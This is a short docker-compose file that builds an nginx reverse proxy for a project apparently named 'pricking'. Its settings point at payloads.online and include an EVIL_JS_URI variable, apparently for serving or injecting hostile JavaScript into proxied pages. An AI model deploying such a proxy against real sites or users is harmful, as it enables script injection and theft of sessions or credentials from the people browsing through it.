version: '3'
services:
  nginx:
    build:
      context: .
      dockerfile: ./docker/Dockerfile
    ports:
     - "80:80"
    volumes:
     - ./:/tmp/pricking
    environment:
      PROXY_PASS_HOST: proxy.payloads.online
      PROXY_SOURCE_HOST: payloads.online
      NGINX_LISTEN_PORT: 80
      EVIL_JS_URI: b026324c6904b2a9cb4b88d6d61c81d1
